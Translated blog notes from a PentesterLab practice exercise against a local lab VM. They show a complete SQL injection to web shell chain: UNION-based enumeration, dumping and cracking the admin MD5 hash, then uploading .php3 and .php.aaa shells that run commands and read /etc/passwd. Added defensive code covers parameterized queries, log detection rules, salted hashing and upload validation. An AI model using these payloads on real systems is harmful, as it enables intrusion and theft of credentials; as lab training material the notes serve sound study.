[Old post] [Original] From_mysql_to shell pentest platform practice notes
Posted on: 2015-1-28 14:00

From_mysql_to shell pentest platform practice notes
http://192.168.128.128/
http://192.168.128.128/cat.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
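The syntax error above is the tell: the raw `id` value is being pasted into the SQL text, so a single quote breaks the statement and a crafted value later extends it with a UNION. The following is an added example (not code from the notes or from PentesterLab) that reproduces both the vulnerable and the hardened query shape in Python against an in-memory SQLite table. The `pictures` schema (`id, title, img, cat`) is assumed from the column names enumerated later in the notes, the rows are constructed, and MySQL-only details such as `#` comments and `version()` are not reproduced; the point is the string concatenation versus the bound parameter.

```python
import re
import sqlite3

# Constructed stand-in for the photoblog's pictures table (schema assumed).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pictures (id INTEGER, title TEXT, img TEXT, cat INTEGER)")
    db.executemany("INSERT INTO pictures VALUES (?, ?, ?, ?)", [
        (1, "Ruby", "ruby.jpg", 1),
        (2, "Cthulhu", "cthulhu.png", 1),
        (3, "Hacker", "hacker.png", 2),
    ])
    return db

def titles_vulnerable(db, raw_id):
    """Builds the query by string concatenation, as cat.php evidently does:
    whatever arrives in ?id= becomes part of the SQL text."""
    sql = "SELECT id, title, img, cat FROM pictures WHERE cat=" + raw_id
    try:
        return [row[1] for row in db.execute(sql)]
    except sqlite3.OperationalError as exc:
        # This branch is what the "You have an error in your SQL syntax" page shows.
        return "SQL error: " + str(exc)

def titles_safe(db, raw_id):
    """Hardened form: enforce the expected type first, then pass the value as a
    bound parameter so the database never parses it as SQL."""
    if not re.fullmatch(r"\d+", raw_id):
        return "bad id"
    rows = db.execute("SELECT id, title, img, cat FROM pictures WHERE cat=?", (int(raw_id),))
    return [row[1] for row in rows]

if __name__ == "__main__":
    db = make_db()
    print(titles_vulnerable(db, "1'"))
    print(titles_vulnerable(db, "2 union select 1,'injected',3,4"))
    print(titles_safe(db, "1"))
    print(titles_safe(db, "2 union select 1,'injected',3,4"))
```

With the concatenated query, `1'` yields a database error and the UNION value returns a row the application never stored; with the bound parameter both inputs are rejected before reaching the database. The type check is a belt-and-braces measure: the bound parameter alone already prevents injection, but rejecting non-numeric ids also removes the error page that made the injection easy to confirm.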
telnet 192.168.128.128 80
http://192.168.128.128/cat.php?id=2%20order%20by%203#
Displays normally
http://192.168.128.128/cat.php?id=2%20order%20by%204#
Displays normally
http://192.168.128.128/cat.php?id=2%20order%20by%205#
Unknown column '5' in 'order clause'
http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4
Displays all pages
http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4,5
The used SELECT statements have a different number of columns
http://192.168.128.128/cat.php?id=2%20union%20select%20user(),database(),version(),4
Displays all pages, but none of the user() etc. values appear
http://192.168.128.128/cat.php?id=1%20union%20select%20user(),database(),@@version,current_user()
Displays all pages, but none of the user() etc. values appear
http://192.168.128.128/cat.php?id=1%20union%20select%201,user(),3,4
Displays picture: pentesterlab@localhost
http://192.168.128.128/cat.php?id=1%20union%20select%201,database(),3,4
picture: photoblog
http://192.168.128.128/cat.php?id=1%20union%20select%201,version(),3,4
picture: 5.1.63-0+squeeze1
http://192.168.128.128/cat.php?id=1%20union%20select%201,current_user(),3,4
picture: pentesterlab@localhost
http://192.168.128.128/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tables
Unknown column 'tablename' in 'field list'
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables
picture: character_sets
CHARACTER_SETS
picture: collations
COLLATIONS
picture: collation_character_set_applicability
COLLATION_CHARACTER_SET_APPLICABILITY
picture: columns
COLUMNS
picture: column_privileges
COLUMN_PRIVILEGES
picture: engines
ENGINES
picture: events
EVENTS
picture: files
FILES
picture: global_status
GLOBAL_STATUS
picture: global_variables
GLOBAL_VARIABLES
picture: key_column_usage
KEY_COLUMN_USAGE
picture: partitions
PARTITIONS
picture: plugins
PLUGINS
picture: processlist
PROCESSLIST
picture: profiling
PROFILING
picture: referential_constraints
REFERENTIAL_CONSTRAINTS
picture: routines
ROUTINES
picture: schemata
SCHEMATA
picture: schema_privileges
SCHEMA_PRIVILEGES
picture: session_status
SESSION_STATUS
picture: session_variables
SESSION_VARIABLES
picture: statistics
STATISTICS
picture: tables
TABLES
picture: table_constraints
TABLE_CONSTRAINTS
picture: table_privileges
TABLE_PRIVILEGES
picture: triggers
TRIGGERS
picture: user_privileges
USER_PRIVILEGES
picture: views
VIEWS
picture: categories
categories
picture: pictures
pictures
picture: users
users
http://192.168.128.128/cat.php?id=1%20union%20select%201,column_name,3,4%20from%20information_schema.columns
picture: character_set_name
CHARACTER_SET_NAME
picture: default_collate_name
DEFAULT_COLLATE_NAME
picture: description
DESCRIPTION
picture: maxlen
MAXLEN
picture: collation_name
COLLATION_NAME
picture: id
ID
picture: is_default
IS_DEFAULT
picture: is_compiled
IS_COMPILED
picture: sortlen
SORTLEN
picture: table_catalog
TABLE_CATALOG
picture: table_schema
TABLE_SCHEMA
picture: table_name
TABLE_NAME
picture: column_name
COLUMN_NAME
picture: ordinal_position
ORDINAL_POSITION
picture: column_default
COLUMN_DEFAULT
picture: is_nullable
IS_NULLABLE
picture: data_type
DATA_TYPE
picture: character_maximum_length
CHARACTER_MAXIMUM_LENGTH
picture: character_octet_length
CHARACTER_OCTET_LENGTH
picture: numeric_precision
NUMERIC_PRECISION
picture: numeric_scale
NUMERIC_SCALE
picture: column_type
COLUMN_TYPE
picture: column_key
COLUMN_KEY
picture: extra
EXTRA
picture: privileges
PRIVILEGES
picture: column_comment
COLUMN_COMMENT
picture: grantee
GRANTEE
picture: privilege_type
PRIVILEGE_TYPE
picture: is_grantable
IS_GRANTABLE
picture: engine
ENGINE
picture: support
SUPPORT
picture: comment
COMMENT
picture: transactions
TRANSACTIONS
picture: xa
XA
picture: savepoints
SAVEPOINTS
picture: event_catalog
EVENT_CATALOG
picture: event_schema
EVENT_SCHEMA
picture: event_name
EVENT_NAME
picture: definer
DEFINER
picture: time_zone
TIME_ZONE
picture: event_body
EVENT_BODY
picture: event_definition
EVENT_DEFINITION
picture: event_type
EVENT_TYPE
picture: execute_at
EXECUTE_AT
picture: interval_value
INTERVAL_VALUE
picture: interval_field
INTERVAL_FIELD
picture: sql_mode
SQL_MODE
picture: starts
STARTS
picture: ends
ENDS
picture: status
STATUS
picture: on_completion
ON_COMPLETION
picture: created
CREATED
picture: last_altered
LAST_ALTERED
picture: last_executed
LAST_EXECUTED
picture: event_comment
EVENT_COMMENT
picture: originator
ORIGINATOR
picture: character_set_client
CHARACTER_SET_CLIENT
picture: collation_connection
COLLATION_CONNECTION
picture: database_collation
DATABASE_COLLATION
picture: file_id
FILE_ID
picture: file_name
FILE_NAME
picture: file_type
FILE_TYPE
picture: tablespace_name
TABLESPACE_NAME
picture: logfile_group_name
LOGFILE_GROUP_NAME
picture: logfile_group_number
LOGFILE_GROUP_NUMBER
picture: fulltext_keys
FULLTEXT_KEYS
picture: deleted_rows
DELETED_ROWS
picture: update_count
UPDATE_COUNT
picture: free_extents
FREE_EXTENTS
picture: total_extents
TOTAL_EXTENTS
picture: extent_size
EXTENT_SIZE
picture: initial_size
INITIAL_SIZE
picture: maximum_size
MAXIMUM_SIZE
picture: autoextend_size
AUTOEXTEND_SIZE
picture: creation_time
CREATION_TIME
picture: last_update_time
LAST_UPDATE_TIME
picture: last_access_time
LAST_ACCESS_TIME
picture: recover_time
RECOVER_TIME
picture: transaction_counter
TRANSACTION_COUNTER
picture: version
VERSION
picture: row_format
ROW_FORMAT
picture: table_rows
TABLE_ROWS
picture: avg_row_length
AVG_ROW_LENGTH
picture: data_length
DATA_LENGTH
picture: max_data_length
MAX_DATA_LENGTH
picture: index_length
INDEX_LENGTH
picture: data_free
DATA_FREE
picture: create_time
CREATE_TIME
picture: update_time
UPDATE_TIME
picture: check_time
CHECK_TIME
picture: checksum
CHECKSUM
picture: variable_name
VARIABLE_NAME
picture: variable_value
VARIABLE_VALUE
picture: constraint_catalog
CONSTRAINT_CATALOG
picture: constraint_schema
CONSTRAINT_SCHEMA
picture: constraint_name
CONSTRAINT_NAME
picture: position_in_unique_constraint
POSITION_IN_UNIQUE_CONSTRAINT
picture: referenced_table_schema
REFERENCED_TABLE_SCHEMA
picture: referenced_table_name
REFERENCED_TABLE_NAME
picture: referenced_column_name
REFERENCED_COLUMN_NAME
picture: partition_name
PARTITION_NAME
picture: subpartition_name
SUBPARTITION_NAME
picture: partition_ordinal_position
PARTITION_ORDINAL_POSITION
picture: subpartition_ordinal_position
SUBPARTITION_ORDINAL_POSITION
picture: partition_method
PARTITION_METHOD
picture: subpartition_method
SUBPARTITION_METHOD
picture: partition_expression
PARTITION_EXPRESSION
picture: subpartition_expression
SUBPARTITION_EXPRESSION
picture: partition_description
PARTITION_DESCRIPTION
picture: partition_comment
PARTITION_COMMENT
picture: nodegroup
NODEGROUP
picture: plugin_name
PLUGIN_NAME
picture: plugin_version
PLUGIN_VERSION
picture: plugin_status
PLUGIN_STATUS
picture: plugin_type
PLUGIN_TYPE
picture: plugin_type_version
PLUGIN_TYPE_VERSION
picture: plugin_library
PLUGIN_LIBRARY
picture: plugin_library_version
PLUGIN_LIBRARY_VERSION
picture: plugin_author
PLUGIN_AUTHOR
picture: plugin_description
PLUGIN_DESCRIPTION
picture: plugin_license
PLUGIN_LICENSE
picture: user
USER
picture: host
HOST
picture: db
DB
picture: command
COMMAND
picture: time
TIME
picture: state
STATE
picture: info
INFO
picture: query_id
QUERY_ID
picture: seq
SEQ
picture: duration
DURATION
picture: cpu_user
CPU_USER
picture: cpu_system
CPU_SYSTEM
picture: context_voluntary
CONTEXT_VOLUNTARY
picture: context_involuntary
CONTEXT_INVOLUNTARY
picture: block_ops_in
BLOCK_OPS_IN
picture: block_ops_out
BLOCK_OPS_OUT
picture: messages_sent
MESSAGES_SENT
picture: messages_received
MESSAGES_RECEIVED
picture: page_faults_major
PAGE_FAULTS_MAJOR
picture: page_faults_minor
PAGE_FAULTS_MINOR
picture: swaps
SWAPS
picture: source_function
SOURCE_FUNCTION
picture: source_file
SOURCE_FILE
picture: source_line
SOURCE_LINE
picture: unique_constraint_catalog
UNIQUE_CONSTRAINT_CATALOG
picture: unique_constraint_schema
UNIQUE_CONSTRAINT_SCHEMA
picture: unique_constraint_name
UNIQUE_CONSTRAINT_NAME
picture: match_option
MATCH_OPTION
picture: update_rule
UPDATE_RULE
picture: delete_rule
DELETE_RULE
picture: specific_name
SPECIFIC_NAME
picture: routine_catalog
ROUTINE_CATALOG
picture: routine_schema
ROUTINE_SCHEMA
picture: routine_name
ROUTINE_NAME
picture: routine_type
ROUTINE_TYPE
picture: dtd_identifier
DTD_IDENTIFIER
picture: routine_body
ROUTINE_BODY
picture: routine_definition
ROUTINE_DEFINITION
picture: external_name
EXTERNAL_NAME
picture: external_language
EXTERNAL_LANGUAGE
picture: parameter_style
PARAMETER_STYLE
picture: is_deterministic
IS_DETERMINISTIC
picture: sql_data_access
SQL_DATA_ACCESS
picture: sql_path
SQL_PATH
picture: security_type
SECURITY_TYPE
picture: routine_comment
ROUTINE_COMMENT
picture: catalog_name
CATALOG_NAME
picture: schema_name
SCHEMA_NAME
picture: default_character_set_name
DEFAULT_CHARACTER_SET_NAME
picture: default_collation_name
DEFAULT_COLLATION_NAME
picture: non_unique
NON_UNIQUE
picture: index_schema
INDEX_SCHEMA
picture: index_name
INDEX_NAME
picture: seq_in_index
SEQ_IN_INDEX
picture: collation
COLLATION
picture: cardinality
CARDINALITY
picture: sub_part
SUB_PART
picture: packed
PACKED
picture: nullable
NULLABLE
picture: index_type
INDEX_TYPE
picture: table_type
TABLE_TYPE
picture: auto_increment
AUTO_INCREMENT
picture: table_collation
TABLE_COLLATION
picture: create_options
CREATE_OPTIONS
picture: table_comment
TABLE_COMMENT
picture: constraint_type
CONSTRAINT_TYPE
picture: trigger_catalog
TRIGGER_CATALOG
picture: trigger_schema
TRIGGER_SCHEMA
picture: trigger_name
TRIGGER_NAME
picture: event_manipulation
EVENT_MANIPULATION
picture: event_object_catalog
EVENT_OBJECT_CATALOG
picture: event_object_schema
EVENT_OBJECT_SCHEMA
picture: event_object_table
EVENT_OBJECT_TABLE
picture: action_order
ACTION_ORDER
picture: action_condition
ACTION_CONDITION
picture: action_statement
ACTION_STATEMENT
picture: action_orientation
ACTION_ORIENTATION
picture: action_timing
ACTION_TIMING
picture: action_reference_old_table
ACTION_REFERENCE_OLD_TABLE
picture: action_reference_new_table
ACTION_REFERENCE_NEW_TABLE
picture: action_reference_old_row
ACTION_REFERENCE_OLD_ROW
picture: action_reference_new_row
ACTION_REFERENCE_NEW_ROW
picture: view_definition
VIEW_DEFINITION
picture: check_option
CHECK_OPTION
picture: is_updatable
IS_UPDATABLE
picture: title
title
picture: img
img
picture: cat
cat
picture: login
login
picture: password
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.columns
Returns a pile of data
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,column_name,4%20from%20information_schema.columns
Returns a pile of data
Join them together with concat(table_name,%27:%27,column_name)
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(table_name,%27:%27,column_name),3,4%20from%20information_schema.columns
Returns a pile of table_name:column_name pairs
picture: users:id
users:id
picture: users:login
users:login
picture: users:password
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(login,%27:%27,password),3,4%20from%20users
picture: admin:8efe310f9ab3efeae8d410a8e0166eb2
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(id,%27:%27,login,%27:%27,password),3,4%20from%20users
picture: 1:admin:8efe310f9ab3efeae8d410a8e0166eb2
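Every request in the sequence above lands in the web server's access log, and the whole chain (quote probe, ORDER BY column count, UNION SELECT, information_schema enumeration) is recognisable after URL decoding. The following is an added detection example, not part of the original notes: it parses Apache combined-format lines, decodes the request target, and flags the patterns seen in this exercise. The log lines are constructed to mirror the requests in the notes (client IP, timestamps and byte counts are made up), and the assumption that `id` must be numeric comes from how cat.php is used here.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed access-log lines modelled on the requests in the notes.
SAMPLE_LOG = """\
192.168.128.1 - - [28/Jan/2015:14:00:01 +0800] "GET /cat.php?id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.128.1 - - [28/Jan/2015:14:00:05 +0800] "GET /cat.php?id=1%27 HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.168.128.1 - - [28/Jan/2015:14:00:09 +0800] "GET /cat.php?id=2%20order%20by%205%23 HTTP/1.1" 200 398 "-" "Mozilla/5.0"
192.168.128.1 - - [28/Jan/2015:14:00:15 +0800] "GET /cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables HTTP/1.1" 200 9071 "-" "Mozilla/5.0"
192.168.128.1 - - [28/Jan/2015:14:01:02 +0800] "GET /admin/uploads/test1.php3?cmd=ls HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameters the application treats as integers (assumption about cat.php).
INTEGER_PARAMS = {"id"}

# Rules applied to the URL-decoded query string.
QUERY_RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("mysql-function", re.compile(r"\b(?:user|database|version|current_user|concat)\s*\(", re.I)),
]
# Rule applied to the decoded path: anything PHP-like served from the upload directory,
# including multi-extension names such as x.php.aaa.
UPLOAD_SCRIPT_RE = re.compile(r"^/admin/uploads/.*\.ph(?:p\d?|tml)\b", re.I)

def classify_target(target):
    """Return the list of rule names a request target triggers (empty if benign)."""
    path_raw, _, query_raw = target.partition("?")
    path = unquote_plus(path_raw)
    query = unquote_plus(query_raw)
    reasons = []
    params = parse_qs(query_raw, keep_blank_values=True)
    for name in INTEGER_PARAMS:
        if any(not re.fullmatch(r"\d+", v) for v in params.get(name, [])):
            reasons.append("non-numeric-" + name)
    for name, rx in QUERY_RULES:
        if rx.search(query):
            reasons.append(name)
    if UPLOAD_SCRIPT_RE.search(path):
        reasons.append("script-under-uploads")
    return reasons

def scan_log(text):
    """Return one finding per suspicious line: (ip, decoded target, reasons)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_target(m.group("target"))
        if reasons:
            findings.append((m.group("ip"), unquote_plus(m.group("target")), reasons))
    return findings

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(reasons))
```

Decoding before matching matters: the raw log carries `%20` and `%27`, so a rule written against `union select` never fires on the encoded form. The non-numeric check is the cheapest and earliest signal in the chain, since the `id=1'` probe precedes every later step; a sequence of ORDER BY requests with increasing numbers from one client, as in the notes, is a column count in progress and worth alerting on by itself.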
Looked up at
http://www.hashkiller.co.uk/md5-decrypter.aspx
and found:
8efe310f9ab3efeae8d410a8e0166eb2 MD5 : P4ssw0rd
Log in to the admin backend and upload test1.php3
INSERT INTO pictures (title, img, cat) VALUES ('','test1.php3','1')
Upload test2.php.aaa
INSERT INTO pictures (title, img, cat) VALUES ('test','test2.php.aaa','1')
Inspecting the page elements shows the image path is admin/uploads
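The lookup worked instantly because the stored value is an unsalted MD5 of the password: one precomputed table answers the query for every user of every site. The following is an added example, not part of the notes, contrasting that storage with a salted, iterated hash (PBKDF2-HMAC-SHA256 from Python's standard library). `PAGE_HASH` is the value recovered above; the wordlist is a constructed five-entry stand-in for the lookup service.

```python
import hashlib
import hmac
import secrets

# The hash recovered from the users table in the notes above.
PAGE_HASH = "8efe310f9ab3efeae8d410a8e0166eb2"

# Constructed miniature wordlist; a real lookup service holds billions of entries.
WORDLIST = ["password", "123456", "admin", "P4ssw0rd", "letmein"]

def md5_hex(password):
    return hashlib.md5(password.encode()).hexdigest()

def lookup_unsalted_md5(digest, wordlist):
    """Unsalted, fast hash: the table is built once and reused against any digest."""
    table = {md5_hex(w): w for w in wordlist}
    return table.get(digest.lower())

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor per OWASP guidance

def hash_password(password, salt=None):
    """Salted, slow hash. Stored form: pbkdf2_sha256$iterations$salt_hex$digest_hex."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)

if __name__ == "__main__":
    print("unsalted md5 lookup:", lookup_unsalted_md5(PAGE_HASH, WORDLIST))
    stored = hash_password("P4ssw0rd")
    print("stored:", stored)
    print("verify correct:", verify_password("P4ssw0rd", stored))
    print("verify wrong:", verify_password("password", stored))
```

Two properties do the work: the per-user random salt means no table can be built in advance (two users with the same password get different stored values), and the iteration count makes each guess cost roughly a million times more than a single MD5. Argon2id or bcrypt are the usual choices in production; PBKDF2 is shown here only because it needs no third-party package.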
http://192.168.128.128/admin/uploads/test1.php3?cmd=ls
cthulhu.png hacker.png ruby.jpg test1.php3 test2.php.aaa
http://192.168.128.128/admin/uploads/test1.php3?cmd=uname%20-a
Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
http://192.168.128.128/admin/uploads/test1.php3?cmd=whoami
www-data
http://192.168.128.128/admin/uploads/test2.php.aaa?cmd=pwd
/var/www/admin/uploads
http://192.168.128.128/admin/uploads/test2.php.aaa?cmd=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
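Both uploads got through because the upload handler trusted the client-supplied filename: `test1.php3` is not `.php` but Apache's PHP handler still runs it, and `test2.php.aaa` is executed because Apache evaluates every extension in a multi-extension name, not just the last one. The following is an added example of the server-side validation that would have refused both (it is not the photoblog's code): an extension allow-list instead of a deny-list, exactly one extension, a magic-byte check on the content, and a server-generated stored name. The allowed formats and the sample payloads are constructed.

```python
import os
import secrets

# Allow-list of extensions with the magic bytes each must start with.
# Assumption: the photoblog only needs raster images.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def validate_upload(filename, data):
    """Return (True, server_chosen_name) or (False, reason)."""
    # Drop any directory component, whichever separator the client used.
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        # test2.php.aaa and dotfiles such as .htaccess stop here.
        return False, "exactly one extension required"
    ext = parts[1].lower()
    if ext not in ALLOWED:
        # test1.php3 stops here: anything not on the list is refused,
        # so no deny-list of php/php3/phtml variants has to be maintained.
        return False, "extension not allowed: " + ext
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match a %s image" % ext
    # Never reuse the client-supplied name: the stored name is random and ours,
    # and it is the value that goes into pictures.img.
    return True, secrets.token_hex(8) + "." + ext

# Constructed sample payloads.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_STUB = b"\xff\xd8\xff\xe0" + b"\x00" * 16
TEXT_STUB = b"<?php echo 'not an image'; ?>"

if __name__ == "__main__":
    for name, data in [("test1.php3", TEXT_STUB), ("test2.php.aaa", TEXT_STUB),
                       ("ruby.jpg", TEXT_STUB), ("Ruby.JPG", JPEG_STUB),
                       ("../../evil.png", PNG_STUB)]:
        print(name, "->", validate_upload(name, data))
```

Validation at upload time is one layer; the other is to make sure nothing under `admin/uploads` can execute at all, by storing uploads outside the document root and streaming them through a handler, or by disabling the PHP engine for that directory in the web server configuration (Apache's `php_admin_flag engine off` in the directory block). With that in place a file that slips past the checks is served as bytes rather than run as code.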